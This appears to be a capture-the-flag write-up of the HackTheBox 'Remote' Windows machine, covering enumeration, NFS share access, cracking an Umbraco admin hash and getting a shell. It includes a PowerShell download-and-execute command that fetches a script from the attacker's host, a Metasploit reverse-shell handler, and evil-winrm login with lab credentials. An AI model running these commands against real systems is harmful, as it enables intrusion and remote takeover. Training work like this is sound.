HackTheBox — Remote

Summary

Remote is a easy windows machine with IP 10.10.10.180

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.180
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-29 12:52 EET
Nmap scan report for 10.10.10.180
Host is up (0.076s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3,4 2049/tcp nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5m03s, deviation: 0s, median: 5m03s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-29 12:59:04
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.53 seconds
root@strike:~#

After scanning finding some interesting rpcbind, So i tried to get more info from rpcbind

root@strike:~/Desktop/HTB/Windows-EX# nmap -sV --script=nfs-showmount -oN remote.nfs 10.10.10.180
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-29 13:59 EET
Nmap scan report for 10.10.10.180
Host is up (0.10s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp open rpcbind 2-4 (RPC #100000)
| nfs-showmount:
|_ /site_backups
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3,4 2049/tcp nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
| nfs-showmount:
|_ /site_backups
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.19 seconds
root@strike:~/Desktop/HTB/Windows-EX#

We need to see nfs disk named site_backups

root@strike:~/Desktop/HTB/Windows-EX# sudo mount -o nfsvers=4 -t nfs remote.htb:/site_backups /mnt

After find interesting Umbraco.sdf file:

root@strike:~# strings Umbraco.sdf | grep admin

So output:

adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50

Exploitation

After decrypt the as sha1 hash get username admin@htb.local and password baconandcheese

./exploit.py -u admin@htb.local -p baconandcheese -i 'http://remote.htb' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.116/Azure-ADConnect.ps1')"

Now using Metasploit to get shell

msf5 exploit(multi/handler) > set payload payload/windows/x64/shell_reverse_tcp
payload => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.15.116
lhost => 10.10.15.116
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.15.116:8888
msf5 exploit(multi/handler) > [*] Command shell session 1 opened (10.10.15.116:8888 -> 10.10.10.180:49697) at 2020-05-02
session -i 1
msf exploit(multi/handler) > session -i 1
[*] Starting interaction with 1...

PS C:\windows\system32\inetsrv>

Gain user flag!

Privilege Escalation

After some search finding admin credentials in secret file username administrator and password !R3m0te!, We can connect using evil-winrm.rb tool

root@strike:~/Desktop/HTB/Windows-EX/evil-winrm# ./evil-winrm.rb -i 10.10.10.180 -u administrator -p '!R3m0te!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/29/2020 6:23 AM 34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop>

Gain root flag!

If u learn any thing useful from write up, Respect me on HackTheBox

THX for ur time!

--

--

--

CTFer | Computer Science Student

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Results of the CarbonEco ERC-20 Pre-Sale

{UPDATE} Callbreak Multiplayer Hack Free Resources Generator

{UPDATE} Dino Evolution Hack Free Resources Generator

America First! (in Data Security Breaches)

Encrypt Passwords and Keys in a Spring Boot Project using Jasypt

{UPDATE} Heart 2 Heart Match Hack Free Resources Generator

Bug Spotlight : Null Dereference, aTricky Little Bug that’s Easy to Miss

{UPDATE} Ropa de otoño para niña sonriente Salón de belleza Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Ahmed Samir

Ahmed Samir

CTFer | Computer Science Student

More from Medium

TryHackMe: Pentesting Fundamentals a Walkthrough

MAL: Malware Introductory — TryHackMe CTF

HackTheBox Write-up

Secret — Hackthebox Write-up